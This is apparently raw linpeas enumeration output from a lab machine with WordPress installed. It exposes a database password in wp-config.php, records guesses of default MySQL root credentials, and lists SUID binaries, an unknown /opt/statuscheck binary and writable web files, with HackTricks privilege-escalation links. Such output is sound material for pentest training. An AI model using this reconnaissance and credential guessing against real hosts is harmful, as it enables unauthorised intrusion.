âââĢ PHP exec extensions
drwxr-xr-x 2 root root 4096 Jun 28 2019 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Jun 28 2019 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Jun 28 2019 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 1332 Nov 3 2018 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 Jun 28 2019 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 70999 Mar 8 2019 /etc/php/7.0/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 70656 Mar 8 2019 /etc/php/7.0/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
ââââââââââââĢ Searching AD cached hashes
-rw------- 1 root root 430080 Jun 28 2019 /var/lib/samba/private/secrets.tdb
ââââââââââââĢ Analyzing MariaDB Files (limit 70)
-rw-r--r-- 1 root root 869 Feb 6 2019 /etc/mysql/mariadb.cnf
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/
-rw------- 1 root root 277 Jun 28 2019 /etc/mysql/debian.cnf
ââââââââââââĢ Analyzing Wordpress Files (limit 70)
-rw-rw-rw- 1 helios helios 3182 Jun 28 2019 /var/www/html/h3l105/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'password123' );
define( 'DB_HOST', 'localhost' );
ââââââââââââĢ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Dec 10 2017 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
ââââââââââââĢ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Jun 28 2019 /etc/pam.d
-rw-r--r-- 1 root root 2133 Mar 1 2019 /etc/pam.d/sshd
account required pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close
session required pam_loginuid.so
session optional pam_keyinit.so force revoke
session optional pam_motd.so motd=/run/motd.dynamic
session optional pam_motd.so noupdate
session optional pam_mail.so standard noenv # [1]
session required pam_limits.so
session required pam_env.so # [1]
session required pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open
ââââââââââââĢ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Jun 28 2019 /etc/ldap
ââââââââââââĢ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Jun 28 2019 /usr/share/keyrings
ââââââââââââĢ Analyzing Postfix Files (limit 70)
-rwxr-xr-x 1 root root 3624 Mar 25 2019 /etc/init.d/postfix
-rw-r--r-- 1 root root 30 Mar 25 2019 /etc/insserv.conf.d/postfix
-rwxr-xr-x 1 root root 800 Mar 25 2019 /etc/network/if-down.d/postfix
-rwxr-xr-x 1 root root 1117 Mar 25 2019 /etc/network/if-up.d/postfix
drwxr-xr-x 5 root root 4096 Jun 28 2019 /etc/postfix
-rw-r--r-- 1 root root 6068 Jun 28 2019 /etc/postfix/master.cf
flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}
# user=cyrus argv=/cyrus/bin/deliver -e -r ${sender} -m ${extension} ${user}
# flags=R user=cyrus argv=/cyrus/bin/deliver -e -m ${extension} ${user}
flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)
flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient)
flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t$nexthop -f$sender $recipient
flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store ${nexthop} ${user} ${extension}
flags=FR user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py
-rwxr-xr-x 1 root root 800 Mar 25 2019 /etc/ppp/ip-down.d/postfix
-rwxr-xr-x 1 root root 1117 Mar 25 2019 /etc/ppp/ip-up.d/postfix
-rwxr-xr-x 1 root root 439 Mar 25 2019 /etc/resolvconf/update-libc.d/postfix
-rw-r--r-- 1 root root 361 Mar 25 2019 /etc/ufw/applications.d/postfix
drwxr-xr-x 3 root root 4096 Jun 28 2019 /usr/lib/postfix
-rwxr-xr-x 1 root root 14408 Mar 25 2019 /usr/sbin/postfix
-rw-r--r-- 1 root root 694 Apr 12 2016 /usr/share/bash-completion/completions/postfix
drwxr-xr-x 2 root root 4096 Jun 28 2019 /usr/share/doc/postfix
-rw-r--r-- 1 root root 166 Mar 25 2019 /usr/share/lintian/overrides/postfix
drwxr-xr-x 2 root root 4096 Jun 28 2019 /usr/share/postfix
drwxr-xr-x 2 postfix postfix 4096 May 12 10:29 /var/lib/postfix
drwxr-xr-x 20 root root 4096 Jun 28 2019 /var/spool/postfix
find: '/var/spool/postfix/deferred': Permission denied
find: '/var/spool/postfix/bounce': Permission denied
find: '/var/spool/postfix/private': Permission denied
find: '/var/spool/postfix/hold': Permission denied
find: '/var/spool/postfix/defer': Permission denied
find: '/var/spool/postfix/maildrop': Permission denied
find: '/var/spool/postfix/corrupt': Permission denied
find: '/var/spool/postfix/trace': Permission denied
find: '/var/spool/postfix/active': Permission denied
find: '/var/spool/postfix/flush': Permission denied
find: '/var/spool/postfix/incoming': Permission denied
find: '/var/spool/postfix/saved': Permission denied
find: '/var/spool/postfix/public': Permission denied
ââââââââââââĢ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 69 Mar 8 2019 /etc/php/7.0/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Mar 8 2019 /usr/share/php7.0-common/common/ftp.ini
ââââââââââââĢ Analyzing Samba Files (limit 70)
smbstatus only works as root!
-rw-r--r-- 1 root root 9445 Jun 28 2019 /etc/samba/smb.conf
; logon script = logon.cmd
create mask = 0700
directory mask = 0700
; guest ok = yes
;
# The path below should be writable by all users so that their
;
;
; create mask = 0600
; directory mask = 0700
create mask = 0700
browseable = yes
browseable = yes
guest ok = yes
-rw-r--r-- 1 root root 9231 May 8 2019 /usr/share/samba/smb.conf
; logon script = logon.cmd
create mask = 0700
directory mask = 0700
; guest ok = yes
;
# The path below should be writable by all users so that their
;
;
; create mask = 0600
; directory mask = 0700
create mask = 0700
browseable = yes
ââââââââââââĢ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3526 May 15 2017 /etc/skel/.bashrc
-rw-r--r-- 1 helios helios 3526 Jun 28 2019 /home/helios/.bashrc
-rw-r--r-- 1 root root 675 May 15 2017 /etc/skel/.profile
-rw-r--r-- 1 helios helios 675 Jun 28 2019 /home/helios/.profile
ââââââââââââĢ Analyzing Windows Files (limit 70)
lrwxrwxrwx 1 root root 22 Jun 28 2019 /etc/alternatives/my.cnf -> /etc/mysql/mariadb.cnf
lrwxrwxrwx 1 root root 24 Jun 28 2019 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 83 Jun 28 2019 /var/lib/dpkg/alternatives/my.cnf
ââââââââââââĢ Searching kerberos conf files and tickets
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/linux-active-directory.html#linux-active-directory
ptrace protection is disabled (0), you might find tickets inside processes memory
-rw-r--r-- 1 root root 89 Aug 11 2016 /usr/share/samba/setup/krb5.conf
[libdefaults]
default_realm = ${REALM}
dns_lookup_realm = false
dns_lookup_kdc = true
tickets kerberos Not Found
klist Not Found
ââââââââââââĢ Searching mysql credentials and exec
From '/etc/mysql/mariadb.conf.d/50-server.cnf' Mysql user: user = mysql
Found readable /etc/mysql/my.cnf
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/
ââââââââââââĢ MySQL version
mysql Ver 15.1 Distrib 10.1.38-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
ââĢ MySQL connection using default root/root ........... No
ââĢ MySQL connection using root/toor ................... No
ââĢ MySQL connection using root/NOPASS ................. No
ââââââââââââĢ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 5138 May 25 2017 /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg
-rw-r--r-- 1 root root 5147 May 25 2017 /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg
-rw-r--r-- 1 root root 2775 May 25 2017 /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg
-rw-r--r-- 1 root root 7483 May 25 2017 /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7492 May 25 2017 /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2275 May 25 2017 /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
-rw-r--r-- 1 root root 3780 May 25 2017 /etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg
-rw-r--r-- 1 root root 2851 May 25 2017 /etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg
-rw-r--r-- 1 root root 3452 Feb 7 2019 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 36941 May 25 2017 /usr/share/keyrings/debian-archive-keyring.gpg
-rw-r--r-- 1 root root 17538 May 25 2017 /usr/share/keyrings/debian-archive-removed-keys.gpg
-rw-r--r-- 1 root root 2434 Apr 27 2019 /var/lib/apt/lists/ftp.us.debian.org_debian_dists_stretch_Release.gpg
-----BEGIN PGP SIGNATURE-----
iQIzBAABCAAdFiEEob2OnXj3/lw+Zdivi0itYkaSVVMFAlzEIUQACgkQi0itYkaS
VVPw6xAAmMYOUY9pICjACM0py/CoqCpSOdSHGdi/EUdkza/K+zQBg+Yr1cqkmGjF
ytmjpTlFKsG3cyDH67vaC8JxNDINre+p6Iv/dkRXAwpnGknusrj34jx4RvByjypj
DqhuJNeBCrgnu8ztPP1FvNpkau5JHbgiuFTDpcDly1W/BeZgYVOsciHgnAepTFCR
cqzIQ5Cau6QOTAyq099M9lBqOjSX8cAaWfemSzeF1lcF0J21Rsv8Xc8GtFPcntnm
aW3LS2MjiyA+UTDZziqIvNDWIQKlI98hwZeeDUBTBhPWDzpBH1bnZVHpwEKSgRDx
gOsL138LGoSNHTkQGsrBYKqlSNo8xcXWocQh6jaFa11haTU95juNb6ePJUNfMvFn
57TlGxSMOkgHgBSodDGFwrEIBV2TrgaWpX3kDSsI6ALVHO650eOlCZIi3NLCSQG4
qIkLx+zRDKA0oJt/9EqpG+k6cUU1ePFF7YkH7Y2XrHtgwWK21FXGVDzqUsTk0+Hh
IwFJq9xTBeHPTlP6+pw9iMSAbF3CmRxETXnMgQdgjl9XAnjs7+DTeYDBvU7AeUVB
t919QOh5A6yGqUI99kre3Bo4NKlR54AUWOaLi5s1sPMVyaT8diirzd2tT89Rp7Uy
j9ksDeB2GIRM63TdvsXXwUcAKXd1wLjyaui4s7MsjZSFBvbl+BWJAjMEAAEIAB0W
IQQSbA0kvYopQsx9+Kx2ONBEK5DQEAUCXMQhRAAKCRB2ONBEK5DQEOakEACF9yqX
XZk6gMClONDyj6ljpIfNBO44wNl6uabn+UXVG5TXgxcTYkTf0kIg2pdE52cxis7w
8bKmmvpI2be+ysg2exTostlOgz+LUCM4fNfsehtP3niMtfi31l8L3oJVvF/awHF0
hLP0LCx7auHBLDhjtMF3uRa9u3y/D5FmAQHCXZq/44y7pb5Oxz4fWuGZm66q27Gp
2xTfZJLzTgWzo5EAnMC+lXr2XNOexozvqwjysobuPxXewMMzRUI+sHC0GZpWYiy8
E9XIB23/z2tL9nVSBVc2QNqS8f60c4a04os6D/2+JGL8d7wWaANepD8Aioj7E4uK
iwmHQAOpTreyywreG2k4+QaEAYOrkPc3Djfe22LemQM9F7VqPhTTtdtUqhZfxkqY
zOzanmJ43X6c8BPNbN9OLY819Upbczsm/w2RFYFuzEDUFHvzU0APMzuRZoL1UK48
42CTBziC24FxPn8APdVHjSghFT1KyHDDKNT5D3kSgrP1oZ3uDkjapa8U7su8kBiM
X9Vvypce+uUclzmUJbnOiy/WjAYNA+ulikU8n5YN1wUbm+57szI8zg+wl8T1hJYf
Z0w+Uj+uc6UV8O7J7s419/M/5dBEPN85AUEPV1O4/RHdur0JnDGYmOJ9X4bsa3qz
hLYYJ+LVG8IRQAgWr9TyfOCp3b79eDxDYY2jaA==
=VFn6
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNATURE-----
iQIzBAABCAAdFiEEBn48RWuuJArO6I9v7w84Khp7ZQAFAlzEIe0ACgkQ7w84Khp7
ZQDeSBAAq1yhIaKrx7gbMzByxjjbtlA3ZnAvm84txxijkUkVS5Nhb/c0XXYdvDCE
8tWzHzNhhcx8RhKhkezgdcJz6p5keAna/yocCh4xKIMHHm3SptgJixfnUOiBxN+J
IzkUv90v4xUtJW1EbZHz54rNX+OyI9RtVZDfMG1wnVkh05f92s4yzceZCMbWrd/+
TDUd9Gw3IsPw2Sk8Uij9fW9YxhYETyS5dFlJD3epbX/vh1li2fX32sgDrVkIhCfJ
nN5b8P7LX66T0wnStUH0shwFTCtfHrfSLj8d/lVOQ6wI3xnfM3QhcRbn1rPGHOe2
yn4QEozdP11z5z7dgh+2eWcwZauQUzp5b9u4WmwXDt4+nzohRLcvqnp5i144YNj+
EHCuyaP1VhBL7ra/+CrtMIeNicrC815vdKkVAFCMHm35uSlI7kQjkHLw+FSMxyDE
1P4AOP7j/VYPwzHabF3EozWEsvkO/Sp5fC/ebzeEoCMbr1rgJDpfZ+nsLc4KN4Re
uBKbkOC+Rnxp6tsKZ/GcfcZv8PS0dk9W9ptO20mMo5A8zP+n8bfh8LSW0kzFdwTp
pGYXqDX7ZP1lhCCkmhIoUrSQix2+7ns8LnBRPVInUNuGiMD1wxNi8m9ShKV9Ya6K
pctks4qaSN77SUkPiOpmMVLf04/BQWxB7XrdltefnTcWws/OayA=
=udpf
-----END PGP SIGNATURE-----
ââââââââââââĢ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
ââââââââââââĢ Searching ssl/ssh files
ââââââââââââĢ Analyzing SSH Files (limit 70)
-rw-r--r-- 1 root root 175 Jun 28 2019 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 95 Jun 28 2019 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 395 Jun 28 2019 /etc/ssh/ssh_host_rsa_key.pub
PermitRootLogin yes
ChallengeResponseAuthentication no
UsePAM yes
âââĢ Some certificates were found (out limited):
/etc/ssl/certs/ACCVRAIZ1.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/etc/ssl/certs/AC_RaÃz_CerticÃĄmara_S.A..pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AddTrust_External_Root.pem
/etc/ssl/certs/AddTrust_Low-Value_Services_Root.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/CA_Disig_Root_R2.pem
1506PSTORAGE_CERTSBIN
âââĢ Some home ssh config file was found
/usr/share/openssh/sshd_config
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
âââĢ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
ââââââââââââââââââââââââââââââââââââââ
âââââââââââââââââââââââĢ Files with Interesting Permissions â ââââââââââââââââââââââ
ââââââââââââââââââââââââââââââââââââââ
ââââââââââââĢ SUID - Check easy privesc, exploits and write perms
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 10K Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42K Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 431K Mar 1 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 59K May 17 2017 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 75K May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K May 17 2017 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 40K May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 49K May 17 2017 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 8.5K Jun 28 2019 /opt/statuscheck (Unknown SUID binary!)
-rwsr-xr-x 1 root root 44K Mar 7 2018 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 31K Mar 7 2018 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 40K May 17 2017 /bin/su
-rwsr-xr-x 1 root root 60K Nov 10 2016 /bin/ping
ââââââââââââĢ SGID
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
-rwxr-sr-x 1 root shadow 35K May 27 2017 /sbin/unix_chkpwd
-r-xr-sr-x 1 root postdrop 15K Mar 25 2019 /usr/sbin/postdrop
-r-xr-sr-x 1 root postdrop 23K Mar 25 2019 /usr/sbin/postqueue
-rwxr-sr-x 1 root shadow 23K May 17 2017 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 71K May 17 2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 15K Apr 12 2017 /usr/bin/bsd-write
-rwxr-sr-x 1 root tty 27K Mar 7 2018 /usr/bin/wall
-rwxr-sr-x 1 root ssh 351K Mar 1 2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mail 19K Jan 17 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root crontab 40K Oct 7 2017 /usr/bin/crontab
-rwxr-sr-x 1 root mail 11K Dec 24 2016 /usr/bin/dotlock.mailutils
ââââââââââââĢ Files with ACLs (limited to 50)
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls
files with acls in searched folders Not Found
ââââââââââââĢ Capabilities
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities
âââĢ Current shell capabilities
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
âââĢ Parent proc capabilities
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Files with capabilities (limited to 50):
ââââââââââââĢ Checking misconfigurations of ld.so
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#ldso
/etc/ld.so.conf
Content of /etc/ld.so.conf:
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/libc.conf
- /usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
- /lib/x86_64-linux-gnu
- /usr/lib/x86_64-linux-gnu
/etc/ld.so.preload
ââââââââââââĢ Files (scripts) in /etc/profile.d/
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#profiles-files
total 12
drwxr-xr-x 2 root root 4096 Jun 28 2019 .
drwxr-xr-x 83 root root 4096 May 28 16:05 ..
-rw-r--r-- 1 root root 663 Apr 12 2016 bash_completion.sh
ââââââââââââĢ Permissions in init, init.d, systemd, and rc.d
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd
ââââââââââââĢ AppArmor binary profiles
-rw-r--r-- 1 root root 730 Apr 16 2019 usr.sbin.mysqld
ââĢ Hashes inside passwd file? ........... No
ââĢ Writable passwd file? ................ No
ââĢ Credentials in fstab/mtab? ........... No
ââĢ Can I read shadow files? ............. No
ââĢ Can I read shadow plists? ............ No
ââĢ Can I write shadow plists? ........... No
ââĢ Can I read opasswd file? ............. No
ââĢ Can I write in network-scripts? ...... No
ââĢ Can I read root folder? .............. No
ââââââââââââĢ Searching root files in home dirs (limit 30)
/home/
/home/helios/.bash_history
/root/
/var/www
ââââââââââââĢ Searching folders owned by me containing others files on it (limit 100)
ââââââââââââĢ Readable files belonging to root and readable by me but not world readable
ââââââââââââĢ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files
uniq: write error: Broken pipe
/dev/mqueue
/dev/shm
/home/helios
/run/lock
/run/lock/apache2
/tmp
/tmp/linpeas.sh
/var/lib/php/sessions
/var/mail/helios
/var/spool/samba
/var/tmp
/var/www/html
/var/www/html/h3l105
/var/www/html/h3l105/.htaccess
/var/www/html/h3l105/index.php
/var/www/html/h3l105/license.txt
/var/www/html/h3l105/readme.html
/var/www/html/h3l105/wp-activate.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-admin/about.php
/var/www/html/h3l105/wp-admin/admin-ajax.php
/var/www/html/h3l105/wp-admin/admin-footer.php
/var/www/html/h3l105/wp-admin/admin-functions.php
/var/www/html/h3l105/wp-admin/admin-header.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-admin/css/about-rtl.css
/var/www/html/h3l105/wp-admin/css/about-rtl.min.css
/var/www/html/h3l105/wp-admin/css/about.css
/var/www/html/h3l105/wp-admin/css/about.min.css
/var/www/html/h3l105/wp-admin/css/admin-menu-rtl.css
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-admin/css/colors/_admin.scss
/var/www/html/h3l105/wp-admin/css/colors/_mixins.scss
/var/www/html/h3l105/wp-admin/css/colors/_variables.scss
/var/www/html/h3l105/wp-admin/css/colors/blue
/var/www/html/h3l105/wp-admin/css/colors/blue/colors-rtl.css
/var/www/html/h3l105/wp-admin/css/colors/blue/colors-rtl.min.css
/var/www/html/h3l105/wp-admin/css/colors/blue/colors.css
/var/www/html/h3l105/wp-admin/css/colors/blue/colors.min.css
/var/www/html/h3l105/wp-admin/css/colors/blue/colors.scss
/var/www/html/h3l105/wp-admin/css/colors/coffee
/var/www/html/h3l105/wp-admin/css/colors/coffee/colors-rtl.css
/var/www/html/h3l105/wp-admin/css/colors/coffee/colors-rtl.min.css
/var/www/html/h3l105/wp-admin/css/colors/coffee/colors.css
/var/www/html/h3l105/wp-admin/css/colors/coffee/colors.min.css
/var/www/html/h3l105/wp-admin/css/colors/coffee/colors.scss
/var/www/html/h3l105/wp-admin/css/colors/ectoplasm
/var/www/html/h3l105/wp-admin/css/colors/ectoplasm/colors-rtl.css
/var/www/html/h3l105/wp-admin/css/colors/ectoplasm/colors-rtl.min.css
/var/www/html/h3l105/wp-admin/css/colors/ectoplasm/colors.css
/var/www/html/h3l105/wp-admin/css/colors/ectoplasm/colors.min.css
/var/www/html/h3l105/wp-admin/css/colors/ectoplasm/colors.scss
/var/www/html/h3l105/wp-admin/css/colors/light
/var/www/html/h3l105/wp-admin/css/colors/light/colors-rtl.css
/var/www/html/h3l105/wp-admin/css/colors/light/colors-rtl.min.css
/var/www/html/h3l105/wp-admin/css/colors/light/colors.css
/var/www/html/h3l105/wp-admin/css/colors/light/colors.min.css
/var/www/html/h3l105/wp-admin/css/colors/light/colors.scss
/var/www/html/h3l105/wp-admin/css/colors/midnight
/var/www/html/h3l105/wp-admin/css/colors/midnight/colors-rtl.css
/var/www/html/h3l105/wp-admin/css/colors/midnight/colors-rtl.min.css
/var/www/html/h3l105/wp-admin/css/colors/midnight/colors.css
/var/www/html/h3l105/wp-admin/css/colors/midnight/colors.min.css
/var/www/html/h3l105/wp-admin/css/colors/midnight/colors.scss
/var/www/html/h3l105/wp-admin/css/colors/ocean
/var/www/html/h3l105/wp-admin/css/colors/ocean/colors-rtl.css
/var/www/html/h3l105/wp-admin/css/colors/ocean/colors-rtl.min.css
/var/www/html/h3l105/wp-admin/css/colors/ocean/colors.css
/var/www/html/h3l105/wp-admin/css/colors/ocean/colors.min.css
/var/www/html/h3l105/wp-admin/css/colors/ocean/colors.scss
/var/www/html/h3l105/wp-admin/css/colors/sunrise
/var/www/html/h3l105/wp-admin/css/colors/sunrise/colors-rtl.css
/var/www/html/h3l105/wp-admin/css/colors/sunrise/colors-rtl.min.css
/var/www/html/h3l105/wp-admin/css/colors/sunrise/colors.css
/var/www/html/h3l105/wp-admin/css/colors/sunrise/colors.min.css
/var/www/html/h3l105/wp-admin/css/colors/sunrise/colors.scss
/var/www/html/h3l105/wp-admin/css/common-rtl.css
/var/www/html/h3l105/wp-admin/css/common-rtl.min.css
/var/www/html/h3l105/wp-admin/css/common.css
/var/www/html/h3l105/wp-admin/css/common.min.css
/var/www/html/h3l105/wp-admin/css/customize-controls-rtl.css
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-admin/custom-background.php
/var/www/html/h3l105/wp-admin/custom-header.php
/var/www/html/h3l105/wp-admin/customize.php
/var/www/html/h3l105/wp-admin/edit-comments.php
/var/www/html/h3l105/wp-admin/edit-form-advanced.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-admin/includes/admin-filters.php
/var/www/html/h3l105/wp-admin/includes/admin.php
/var/www/html/h3l105/wp-admin/includes/ajax-actions.php
/var/www/html/h3l105/wp-admin/includes/bookmark.php
/var/www/html/h3l105/wp-admin/includes/class-automatic-upgrader-skin.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-admin/index.php
/var/www/html/h3l105/wp-admin/install-helper.php
/var/www/html/h3l105/wp-admin/install.php
/var/www/html/h3l105/wp-admin/js
/var/www/html/h3l105/wp-admin/js/accordion.js
/var/www/html/h3l105/wp-admin/js/accordion.min.js
/var/www/html/h3l105/wp-admin/js/code-editor.js
/var/www/html/h3l105/wp-admin/js/code-editor.min.js
/var/www/html/h3l105/wp-admin/js/color-picker.js
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-admin/js/widgets/custom-html-widgets.js
/var/www/html/h3l105/wp-admin/js/widgets/custom-html-widgets.min.js
/var/www/html/h3l105/wp-admin/js/widgets/media-audio-widget.js
/var/www/html/h3l105/wp-admin/js/widgets/media-audio-widget.min.js
/var/www/html/h3l105/wp-admin/js/widgets/media-gallery-widget.js
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-admin/js/word-count.js
/var/www/html/h3l105/wp-admin/js/word-count.min.js
/var/www/html/h3l105/wp-admin/js/wp-fullscreen-stub.js
/var/www/html/h3l105/wp-admin/js/wp-fullscreen-stub.min.js
/var/www/html/h3l105/wp-admin/js/xfn.js
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-admin/link-add.php
/var/www/html/h3l105/wp-admin/link-manager.php
/var/www/html/h3l105/wp-admin/link-parse-opml.php
/var/www/html/h3l105/wp-admin/link.php
/var/www/html/h3l105/wp-admin/load-scripts.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-admin/maint/repair.php
/var/www/html/h3l105/wp-admin/media-new.php
/var/www/html/h3l105/wp-admin/media-upload.php
/var/www/html/h3l105/wp-admin/media.php
/var/www/html/h3l105/wp-admin/menu-header.php
/var/www/html/h3l105/wp-admin/menu.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-admin/network/about.php
/var/www/html/h3l105/wp-admin/network/admin.php
/var/www/html/h3l105/wp-admin/network/credits.php
/var/www/html/h3l105/wp-admin/network/edit.php
